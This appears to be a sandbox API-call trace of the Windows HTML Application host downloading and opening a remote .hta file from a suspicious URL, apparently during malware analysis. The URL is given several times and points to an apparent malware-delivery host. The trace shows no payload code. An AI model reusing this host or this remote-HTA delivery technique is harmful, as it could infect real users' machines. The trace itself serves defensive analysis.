[0067.784] IWinInetInfo:RemoteQueryOption (in: This=0x2ba248, dwOption=0x42, pBuffer=0x20c0d0*=0xcc, pcbBuf=0x20c09c*=0x2cc | out: pBuffer=0x20c0d0*=0xcc, pcbBuf=0x20c09c*=0x2cc) returned 0x0
[0067.784] IWinInetInfo:RemoteQueryOption (in: This=0x2ba248, dwOption=0xfffe, pBuffer=0x2ba150*=0x0, pcbBuf=0x20c080*=0x8 | out: pBuffer=0x2ba150*=0xd0, pcbBuf=0x20c080*=0x8) returned 0x0
[0067.784] IUnknown:Release (This=0x2ba248) returned 0x6
[0067.784] IInternetProtocolSink:ReportResult (This=0x2ba020, hrResult=0x0, dwError=0x0, szResult=0x0) returned 0x0
[0067.784] IUnknown:Release (This=0x2ba240) returned 0x4
[0067.784] IUnknown:Release (This=0x27e180) returned 0x17
[0067.784] IUnknown:Release (This=0x27e180) returned 0x16
[0067.784] IUnknown:Release (This=0x27e180) returned 0x15
[0067.784] CoTaskMemFree (pv=0x0)
[0067.784] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x20f220 | out: lpCPInfo=0x20f220) returned 1
[0067.784] IUnknown:AddRef (This=0x294ce0) returned 0x3
[0067.784] IUnknown:AddRef (This=0x27e180) returned 0x16
[0067.784] IUnknown:QueryInterface (in: This=0x27e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x20f260 | out: ppvObject=0x20f260*=0x27e180) returned 0x0
[0067.785] IUnknown:Release (This=0x27e180) returned 0x16
[0067.785] IUnknown:AddRef (This=0x27e180) returned 0x17
[0067.785] IUri:GetScheme (in: This=0x27e180, pdwScheme=0x20f290 | out: pdwScheme=0x20f290*=0x2) returned 0x0
[0067.785] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x350
[0067.785] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7fee08905f0, lpParameter=0x2c3b60, dwCreationFlags=0x0, lpThreadId=0x2c3b80 | out: lpThreadId=0x2c3b80*=0x974) returned 0x354
[0067.786] GetCurrentThreadId () returned 0x628
[0067.786] GetCurrentThreadId () returned 0x628
[0067.786] MulDiv (nNumber=1, nNumerator=4000, nDenominator=3313) returned 1
[0067.786] MulDiv (nNumber=101, nNumerator=1000, nDenominator=4100) returned 25
[0067.786] MulDiv (nNumber=100, nNumerator=10000, nDenominator=1000) returned 1000
[0067.786] MulDiv (nNumber=1, nNumerator=1000, nDenominator=3312) returned 0
[0067.786] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="application/hta", cchCount1=7, lpString2="charset", cchCount2=7) returned 1
[0067.787] IInternetProtocol:Read (in: This=0x2ba240, pv=0x2b218c, cb=0xc8, pcbRead=0x20f1a0 | out: pv=0x2b218c, pcbRead=0x20f1a0*=0xc8) returned 0x0
[0067.787] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", pSecMgr=0x0) returned 0x1
[0067.787] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f0c8 | out: phkResult=0x20f0c8*=0x8c) returned 0x0
[0067.787] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f0d0 | out: phkResult=0x20f0d0*=0x35c) returned 0x0
[0067.787] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x20f058 | out: phkResult=0x20f058*=0x0) returned 0x2
[0067.787] RegOpenKeyExW (in: hKey=0x8c, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x20f058 | out: phkResult=0x20f058*=0x0) returned 0x2
[0067.787] RegCloseKey (hKey=0x0) returned 0x6
[0067.787] RegCloseKey (hKey=0x0) returned 0x6
[0067.787] RegCloseKey (hKey=0x8c) returned 0x0
[0067.787] RegCloseKey (hKey=0x35c) returned 0x0
[0067.787] FindMimeFromData (in: pBC=0x0, pwzUrl="C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\X9OHK109\\t[2].hta", pBuffer=0x20f1e0, cbSize=0xc8, pwzMimeProposed="application/hta", dwMimeFlags=0x6, ppwzMimeOut=0x20f188, dwReserved=0x0 | out: ppwzMimeOut=0x20f188*="application/hta") returned 0x0
[0067.788] CoTaskMemFree (pv=0x2b9d70)
[0067.788] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", pSecMgr=0x0) returned 0x1
[0067.788] StrCmpNIW (lpStr1="applic", lpStr2="image/", nChar=6) returned -1
[0067.788] GetCurrentThreadId () returned 0x628
[0067.788] SetEvent (hEvent=0x350) returned 1
[0067.788] IUnknown:Release (This=0x27e180) returned 0x16
[0067.788] IUnknown:Release (This=0x27e180) returned 0x15
[0067.788] IUnknown:Release (This=0x265140) returned 0x3
[0067.788] IUnknown:Release (This=0x27e180) returned 0x14
[0067.788] IUnknown:Release (This=0x27e180) returned 0x13
[0067.788] IUnknown:Release (This=0x27e180) returned 0x12
[0067.788] IUnknown:Release (This=0x265140) returned 0x2
[0067.788] IUnknown:Release (This=0x27e180) returned 0x11
[0067.788] CoTaskMemFree (pv=0x26b640)
[0067.788] CoTaskMemFree (pv=0x0)
[0067.788] IUnknown:Release (This=0x27e180) returned 0x10
[0067.788] CoTaskMemFree (pv=0x26b5d0)
[0067.788] GetClientRect (in: hWnd=0x1021a, lpRect=0x20fc50 | out: lpRect=0x20fc50) returned 1
[0067.789] GetClientRect (in: hWnd=0x1021a, lpRect=0x299088 | out: lpRect=0x299088) returned 1
[0067.789] OffsetRect (in: lprc=0x299088, dx=0, dy=0 | out: lprc=0x299088) returned 1
[0067.789] OffsetRect (in: lprc=0x299098, dx=0, dy=0 | out: lprc=0x299098) returned 1
[0067.789] RegisterClassExW (param_1=0x20f500) returned 0xc199
[0067.790] CoCreateInstance (in: rclsid=0x7fee0f37850*(Data1=0x50d5107a, Data2=0xd278, Data3=0x4871, Data4=([0]=0x89, [1]=0x89, [2]=0xf4, [3]=0xce, [4]=0xaa, [5]=0xf5, [6]=0x9c, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x401, riid=0x7fee0f2b760*(Data1=0x8c0e040, Data2=0x62d1, Data3=0x11d1, Data4=([0]=0x93, [1]=0x26, [2]=0x0, [3]=0x60, [4]=0xb0, [5]=0x67, [6]=0xb8, [7]=0x6e)), ppv=0x7fee1044320 | out: ppv=0x7fee1044320*=0x2c4110) returned 0x0
[0067.793] CActiveIMMAppEx_Trident:IActiveIMMApp:FilterClientWindows (This=0x2c4110, aaClassList=0x20f680*=0xc199, uSize=0x1) returned 0x0
[0067.793] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc199, lpWindowName=0x0, dwStyle=0x46000000, X=0, Y=0, nWidth=1064, nHeight=587, hWndParent=0x1021a, hMenu=0x0, hInstance=0x7fee0880000, lpParam=0x28d790) returned 0x1021e
[0067.793] GetWindowLongW (hWnd=0x1021e, nIndex=-20) returned 0
[0067.793] SetWindowLongPtrW (hWnd=0x1021e, nIndex=-21, dwNewLong=0x28d790) returned 0x0
[0067.793] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x81, wParam=0x0, lParam=0x20f070*=2676624, plResult=0x20ee30 | out: plResult=0x20ee30) returned 0x1
[0067.793] NtdllDefWindowProc_W () returned 0x1
[0067.793] GetCurrentThreadId () returned 0x628
[0067.794] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0067.794] GetCurrentThreadId () returned 0x628
[0067.794] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0067.794] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x1, wParam=0x0, lParam=0x20f070*=2676624, plResult=0x20ee30 | out: plResult=0x20ee30) returned 0x1
[0067.794] NtdllDefWindowProc_W () returned 0x0
[0067.794] GetCurrentThreadId () returned 0x628
[0067.794] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0067.794] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x5, wParam=0x0, lParam=0x24b0428, plResult=0x20eeb0 | out: plResult=0x20eeb0) returned 0x1
[0067.794] NtdllDefWindowProc_W () returned 0x0
[0067.794] GetCurrentThreadId () returned 0x628
[0067.794] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0067.794] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x3, wParam=0x0, lParam=0x0, plResult=0x20eeb0 | out: plResult=0x20eeb0) returned 0x1
[0067.794] NtdllDefWindowProc_W () returned 0x0
[0067.794] GetCurrentThreadId () returned 0x628
[0067.794] GetClassNameW (in: hWnd=0x1021a, lpClassName=0x20f690, nMaxCount=256 | out: lpClassName="HTML Application Host Window Class") returned 34
[0067.794] StrCmpIW (psz1="HTML Application Host Window Class", psz2="HTMLPageDesignerWndClass") returned -1
[0067.794] CActiveIMMAppEx_Trident:IActiveIMMApp:Activate (This=0x2c4110, fRestoreLayout=1) returned 0x0
[0067.794] SendMessageW (hWnd=0x1021e, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3
[0067.794] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0067.794] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x129, wParam=0x0, lParam=0x0, plResult=0x20f460 | out: plResult=0x20f460) returned 0x1
[0067.794] NtdllDefWindowProc_W () returned 0x3
[0067.794] GetCurrentThreadId () returned 0x628
[0067.794] IntersectRect (in: lprcDst=0x20f920, lprcSrc1=0x299088, lprcSrc2=0x299098 | out: lprcDst=0x20f920) returned 1
[0067.794] EqualRect (lprc1=0x20f920, lprc2=0x299088) returned 1
[0067.794] InvalidateRect (hWnd=0x1021e, lpRect=0x0, bErase=1) returned 1
[0067.795] IntersectRect (in: lprcDst=0x20f7b0, lprcSrc1=0x20f7b0, lprcSrc2=0x20f720 | out: lprcDst=0x20f7b0) returned 1
[0067.795] IntersectRect (in: lprcDst=0x20f7b0, lprcSrc1=0x20f7b0, lprcSrc2=0x20f720 | out: lprcDst=0x20f7b0) returned 1
[0067.795] GetCurrentThreadId () returned 0x628
[0067.795] GetCurrentThreadId () returned 0x628
[0067.795] GetCurrentThreadId () returned 0x628
[0067.796] IntersectRect (in: lprcDst=0x20f530, lprcSrc1=0x20f530, lprcSrc2=0x20f500 | out: lprcDst=0x20f530) returned 1
[0067.796] IntersectRect (in: lprcDst=0x2c5c50, lprcSrc1=0x2c5c50, lprcSrc2=0x20f520 | out: lprcDst=0x2c5c50) returned 1
[0067.796] SetWindowPos (hWnd=0x1021e, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x5f) returned 1
[0067.796] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0067.796] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x46, wParam=0x0, lParam=0x20f920*=66078, plResult=0x20f710 | out: plResult=0x20f710) returned 0x1
[0067.796] NtdllDefWindowProc_W () returned 0x0
[0067.796] GetCurrentThreadId () returned 0x628
[0067.796] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0067.796] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x47, wParam=0x0, lParam=0x20f920*=66078, plResult=0x20f710 | out: plResult=0x20f710) returned 0x1
[0067.796] NtdllDefWindowProc_W () returned 0x0
[0067.797] GetCurrentThreadId () returned 0x628
[0067.797] SetTimer (hWnd=0x1021e, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000
[0067.797] GetFocus () returned 0x0
[0067.797] EnumChildWindows (hWndParent=0x1021e, lpEnumFunc=0x7fee09de450, lParam=0x20f690) returned 0
[0067.797] GetFocus () returned 0x0
[0067.797] SetFocus (hWnd=0x1021e) returned 0x0
[0067.817] NtdllDefWindowProc_W () returned 0x0
[0067.823] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0067.823] LoadLibraryA (lpLibFileName="OLEACC.DLL") returned 0x7fef22f0000
[0067.827] GetProcAddress (hModule=0x7fef22f0000, lpProcName="LresultFromObject") returned 0x7fef22f3aa8
[0067.827] LresultFromObject () returned 0xc11f
[0067.882] GetCurrentThreadId () returned 0x628
[0067.884] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0067.884] GetKeyState (nVirtKey=1) returned 0
[0067.884] GetKeyState (nVirtKey=2) returned 0
[0067.884] GetKeyState (nVirtKey=16) returned 0
[0067.884] GetKeyState (nVirtKey=17) returned 0
[0067.884] GetKeyState (nVirtKey=4) returned 0
[0067.884] GetKeyState (nVirtKey=18) returned 0
[0067.884] GetMessageTime () returned 0
[0067.884] GetMessagePos () returned 0x0
[0067.884] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x20ec00 | out: plResult=0x20ec00) returned 0x0
[0067.885] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0067.885] GetKeyState (nVirtKey=1) returned 0
[0067.885] GetKeyState (nVirtKey=2) returned 0
[0067.885] GetKeyState (nVirtKey=16) returned 0
[0067.885] GetKeyState (nVirtKey=17) returned 0
[0067.885] GetKeyState (nVirtKey=4) returned 0
[0067.885] GetKeyState (nVirtKey=18) returned 0
[0067.885] GetMessageTime () returned 0
[0067.885] GetMessagePos () returned 0x0
[0067.885] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x20e260 | out: plResult=0x20e260) returned 0x0
[0067.885] GetCurrentThreadId () returned 0x628
[0067.885] GetCurrentThreadId () returned 0x628
[0067.885] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0067.885] GetKeyState (nVirtKey=1) returned 0
[0067.885] GetKeyState (nVirtKey=2) returned 0
[0067.885] GetKeyState (nVirtKey=16) returned 0
[0067.885] GetKeyState (nVirtKey=17) returned 0
[0067.886] GetKeyState (nVirtKey=4) returned 0
[0067.886] GetKeyState (nVirtKey=18) returned 0
[0067.886] GetMessageTime () returned 0
[0067.886] GetMessagePos () returned 0x0
[0067.886] GetCursorPos (in: lpPoint=0x20efe0 | out: lpPoint=0x20efe0*(x=724, y=422)) returned 1
[0067.886] ScreenToClient (in: hWnd=0x1021e, lpPoint=0x20efe0 | out: lpPoint=0x20efe0) returned 1
[0067.886] GetKeyState (nVirtKey=16) returned 0
[0067.886] GetKeyState (nVirtKey=17) returned 0
[0067.886] GetKeyState (nVirtKey=18) returned 0
[0067.886] GetKeyState (nVirtKey=160) returned 0
[0067.886] GetKeyState (nVirtKey=162) returned 0
[0067.886] GetKeyState (nVirtKey=164) returned 0
[0067.886] GetCursorPos (in: lpPoint=0x20efe0 | out: lpPoint=0x20efe0*(x=724, y=422)) returned 1
[0067.886] ScreenToClient (in: hWnd=0x1021e, lpPoint=0x20efe0 | out: lpPoint=0x20efe0) returned 1
[0067.886] GetKeyState (nVirtKey=16) returned 0
[0067.886] GetKeyState (nVirtKey=17) returned 0
[0067.886] GetKeyState (nVirtKey=18) returned 0
[0067.886] GetKeyState (nVirtKey=160) returned 0
[0067.886] GetKeyState (nVirtKey=162) returned 0
[0067.886] GetKeyState (nVirtKey=164) returned 0
[0067.886] GetCapture () returned 0x0
[0067.886] GetCurrentThreadId () returned 0x628
[0067.886] GetCurrentThreadId () returned 0x628
[0067.886] GetCurrentThreadId () returned 0x628
[0067.887] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x20f380 | out: plResult=0x20f380) returned 0x1
[0067.887] NtdllDefWindowProc_W () returned 0x0
[0067.887] GetCurrentThreadId () returned 0x628
[0067.887] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x2c4110, hWnd=0x1021e, phIMC=0x20f848 | out: phIMC=0x20f848*=0x10215) returned 0x0
[0067.887] CActiveIMMAppEx_Trident:IActiveIMMApp:AssociateContext (in: This=0x2c4110, hWnd=0x1021e, hIME=0x0, phPrev=0x20f850 | out: phPrev=0x20f850*=0x10215) returned 0x0
[0067.887] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0067.887] GetKeyState (nVirtKey=1) returned 0
[0067.887] GetKeyState (nVirtKey=2) returned 0
[0067.887] GetKeyState (nVirtKey=16) returned 0
[0067.887] GetKeyState (nVirtKey=17) returned 0
[0067.887] GetKeyState (nVirtKey=4) returned 0
[0067.887] GetKeyState (nVirtKey=18) returned 0
[0067.887] GetMessageTime () returned 0
[0067.887] GetMessagePos () returned 0x0
[0067.887] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x20f370 | out: plResult=0x20f370) returned 0x0
[0067.887] GetCurrentThreadId () returned 0x628
[0067.887] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0067.887] GetKeyState (nVirtKey=1) returned 0
[0067.887] GetKeyState (nVirtKey=2) returned 0
[0067.887] GetKeyState (nVirtKey=16) returned 0
[0067.887] GetKeyState (nVirtKey=17) returned 0
[0067.888] GetKeyState (nVirtKey=4) returned 0
[0067.888] GetKeyState (nVirtKey=18) returned 0
[0067.888] GetMessageTime () returned 0
[0067.888] GetMessagePos () returned 0x0
[0067.888] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x20f370 | out: plResult=0x20f370) returned 0x0
[0067.888] GetCurrentThreadId () returned 0x628
[0067.888] IsOS (dwOS=0x25) returned 1
[0067.888] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f658 | out: phkResult=0x20f658*=0x380) returned 0x0
[0067.888] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f660 | out: phkResult=0x20f660*=0x384) returned 0x0
[0067.888] RegOpenKeyExW (in: hKey=0x384, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x20f5e8 | out: phkResult=0x20f5e8*=0x0) returned 0x2
[0067.888] RegOpenKeyExW (in: hKey=0x380, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x20f5e8 | out: phkResult=0x20f5e8*=0x388) returned 0x0
[0067.888] SHRegGetValueW () returned 0x0
[0067.888] RegCloseKey (hKey=0x388) returned 0x0
[0067.888] RegCloseKey (hKey=0x0) returned 0x6
[0067.888] RegCloseKey (hKey=0x0) returned 0x6
[0067.888] RegCloseKey (hKey=0x380) returned 0x0
[0067.888] RegCloseKey (hKey=0x384) returned 0x0
[0067.888] LoadLibraryW (lpLibFileName="ieframe.dll") returned 0x7fef2350000
[0067.892] GetVersionExW (in: lpVersionInformation=0x20f110*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x20f110*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0067.892] LoadLibraryExW (lpLibFileName="ieframe.dll", hFile=0x0, dwFlags=0x22) returned 0x7fef2350000
[0067.892] LoadStringW (in: hInstance=0x7fef2350000, uID=0xb5, lpBuffer=0x20f790, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd
[0067.892] LoadStringW (in: hInstance=0x7fef2350000, uID=0xb5, lpBuffer=0x20f840, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd
[0067.893] LoadStringW (in: hInstance=0x7fef2350000, uID=0xb5, lpBuffer=0x20f810, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd
[0067.893] ShowWindow (hWnd=0x1021e, nCmdShow=1) returned 1
[0067.893] GetMessageW (in: lpMsg=0x20fca0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x20fca0) returned 1
[0067.893] TranslateMessage (lpMsg=0x20fca0) returned 0
[0067.893] DispatchMessageW (lpMsg=0x20fca0) returned 0x0
[0067.893] CreateUri (in: pwzURI="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x20e2b0 | out: ppURI=0x20e2b0*=0x27e180) returned 0x0
[0067.893] IUnknown:QueryInterface (in: This=0x27e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x20e280 | out: ppvObject=0x20e280*=0x27e180) returned 0x0
[0067.893] IUnknown:Release (This=0x27e180) returned 0x11
[0067.893] IUnknown:AddRef (This=0x27e180) returned 0x12
[0067.893] IUnknown:Release (This=0x27e180) returned 0x11
[0067.893] IUnknown:Release (This=0x27e180) returned 0x10
[0067.893] FindResourceW (hModule=0x7fef2350000, lpName=0x1fe, lpType=0x6) returned 0x36f84d0
[0067.893] LoadResource (hModule=0x7fef2350000, hResInfo=0x36f84d0) returned 0x371e53c
[0067.893] LockResource (hResData=0x371e53c) returned 0x371e53c
[0067.893] VirtualQuery (in: lpAddress=0x371e53c, lpBuffer=0x20f3e0, dwLength=0x30 | out: lpBuffer=0x20f3e0*(BaseAddress=0x371e000, AllocationBase=0x3440000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x115000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30
[0067.893] SizeofResource (hModule=0x7fef2350000, hResInfo=0x36f84d0) returned 0xe6
[0067.899] RegisterDragDrop (hwnd=0x1021e, pDropTarget=0x7fee1042728) returned 0x0
[0067.900] GetCurrentThreadId () returned 0x628
[0067.900] GetCurrentThreadId () returned 0x628
[0067.900] GetCurrentThreadId () returned 0x628
[0067.900] GetCurrentThreadId () returned 0x628
[0067.900] GetMessageW (in: lpMsg=0x20fca0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x20fca0) returned 1
[0067.900] TranslateMessage (lpMsg=0x20fca0) returned 0
[0067.900] DispatchMessageW (lpMsg=0x20fca0) returned 0x0
[0067.900] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0067.900] KillTimer (hWnd=0x1021e, uIDEvent=0x1000) returned 1
[0067.900] IUnknown:AddRef (This=0x27e180) returned 0x11
[0067.900] IUri:GetScheme (in: This=0x27e180, pdwScheme=0x20ee08 | out: pdwScheme=0x20ee08*=0x2) returned 0x0
[0067.900] IUri:GetDisplayUri (in: This=0x27e180, pbstrDisplayString=0x20ee30 | out: pbstrDisplayString=0x20ee30*="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x0
[0067.900] GetWindowTextW (in: hWnd=0x1021a, lpString=0x20e980, nMaxCount=512 | out: lpString="") returned 0
[0067.900] SetWindowTextW (hWnd=0x1021a, lpString="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 1
[0067.900] IUnknown:Release (This=0x27e180) returned 0x10
[0067.900] GetCurrentThreadId () returned 0x628
[0067.900] GetMessageW (in: lpMsg=0x20fca0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x20fca0) returned 1
[0067.903] TranslateMessage (lpMsg=0x20fca0) returned 0
[0067.903] DispatchMessageW (lpMsg=0x20fca0) returned 0x0
[0067.903] GetTickCount () returned 0x20398
[0067.903] ParseURLW (in: pcszURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppu=0x20f520 | out: ppu=0x20f520) returned 0x0
[0067.905] GetTickCount () returned 0x20398
[0067.905] GetTickCount () returned 0x20398
[0067.905] GetTickCount () returned 0x20398
[0067.905] GetTickCount () returned 0x20398
[0067.905] GetTickCount () returned 0x20398
[0067.905] GetTickCount () returned 0x20398
[0067.905] GetTickCount () returned 0x20398
[0067.905] GetTickCount () returned 0x20398
[0067.905] GetTickCount () returned 0x20398
[0067.905] GetTickCount () returned 0x20398
[0067.905] GetTickCount () returned 0x20398
[0067.905] GetTickCount () returned 0x20398
[0067.905] GetTickCount () returned 0x20398
[0067.905] GetTickCount () returned 0x20398
[0067.905] GetTickCount () returned 0x20398
[0067.905] GetTickCount () returned 0x20398
[0067.905] GetTickCount () returned 0x20398
[0067.905] GetTickCount () returned 0x20398
[0067.905] GetTickCount () returned 0x20398
[0067.905] GetTickCount () returned 0x20398
[0067.905] GetTickCount () returned 0x20398
[0067.905] GetTickCount () returned 0x20398
[0067.905] GetTickCount () returned 0x20398
[0067.905] GetTickCount () returned 0x20398
[0067.905] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.906] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.907] GetTickCount () returned 0x20398
[0067.908] GetTickCount () returned 0x20398
[0067.908] GetTickCount () returned 0x20398
[0067.908] GetTickCount () returned 0x20398
[0067.908] GetTickCount () returned 0x20398
[0067.908] GetTickCount () returned 0x20398
[0067.908] GetTickCount () returned 0x20398
[0067.908] GetTickCount () returned 0x20398
[0067.908] GetTickCount () returned 0x20398
[0067.908] GetTickCount () returned 0x20398
[0067.908] GetTickCount () returned 0x20398
[0067.908] GetTickCount () returned 0x20398
[0067.908] GetTickCount () returned 0x20398
[0067.908] GetTickCount () returned 0x20398
[0067.908] GetTickCount () returned 0x20398
[0067.908] GetTickCount () returned 0x20398
[0067.908] GetTickCount () returned 0x20398
[0067.908] GetTickCount () returned 0x20398
[0067.908] GetTickCount () returned 0x20398
[0067.908] GetTickCount () returned 0x20398
[0067.909] GetTickCount () returned 0x20398
[0067.909] GetTickCount () returned 0x20398
